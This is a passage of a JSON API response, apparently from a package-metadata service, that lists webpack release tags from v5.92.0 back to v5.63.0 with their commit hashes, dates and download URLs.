ack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","dow